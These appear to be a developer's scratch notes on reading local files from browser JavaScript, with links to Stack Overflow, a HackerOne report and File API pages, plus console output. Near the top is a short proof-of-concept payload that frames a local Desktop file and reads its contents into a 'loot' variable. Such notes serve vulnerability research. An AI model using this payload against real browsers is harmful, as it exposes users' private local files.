https://stackoverflow.com/questions/20035101/why-doesn-t-postman-get-a-no-access-control-allow-origin-header-is-present-on


https://hackerone.com/reports/175979

current_href = document.location.href
frame = document.createElement('iframe'); frame.src = current_href.replace('/Downloads/test.html', '/Desktop/Desktop.txt'); frame.id = 'frm'; document.getElementById('match_info_2').appendChild(frame)
setTimeout(function func(){loot = document.getElementById('frm').contentWindow.document.getElementsByTagName('pre')[0].innerHTML
alert('Your data is: ' + loot)
}, 500)




var z =$.getScript( "test_dir/file_1.txt", function( data, textStatus, jqxhr ) {
  
});
z.responseText;
-----------------------------------
https://stackoverflow.com/questions/14446447/how-to-read-a-local-text-file
-----------------------------------------------------------------------------

var input = document.getElementById("myFile");
var output = document.getElementById("output");


input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    reader.readAsBinaryString(myFile);
  }   
});


<input type="file" id="myFile">
<hr>
<textarea style="width:500px;height: 400px" id="output"></textarea>

--------------------------------------------------------------
https://www.javascripture.com/FileList
---------------------------------------------------
https://wicg.github.io/directory-upload/proposal.html
------------------------------------------------------

*****
var files = document.getElementById("client_file").files;
undefined
files;
FileList {0: File, length: 1}
var file = files[0];
undefined
file;
File {name: "test.txt", lastModified: 1582663909572, lastModifiedDate: Tue Feb 25 2020 15:51:49 GMT-0500 (Eastern Standard Time), webkitRelativePath: "", size: 18, …}name: "test.txt"lastModified: 1582663909572lastModifiedDate: Tue Feb 25 2020 15:51:49 GMT-0500 (Eastern Standard Time) {}webkitRelativePath: ""size: 18type: "text/plain"__proto__: File
var reader = new FileReader();
undefined
reader;
FileReader {readyState: 0, result: null, error: null, onloadstart: null, onprogress: null, …}readyState: 0result: nullerror: nullonloadstart: nullonprogress: nullonload: nullonabort: nullonerror: nullonloadend: null__proto__: FileReader
reader.readAsText(file);
undefined
reader;
FileReader {readyState: 2, result: "this is test file ", error: null, onloadstart: null, onprogress: null, …}readyState: 2result: "this is test file "error: nullonloadstart: nullonprogress: nullonload: nullonabort: nullonerror: nullonloadend: null__proto__: FileReader
var text = reader.result;
undefined
text;
"this is test file "
--------------------------------------------------------------------------
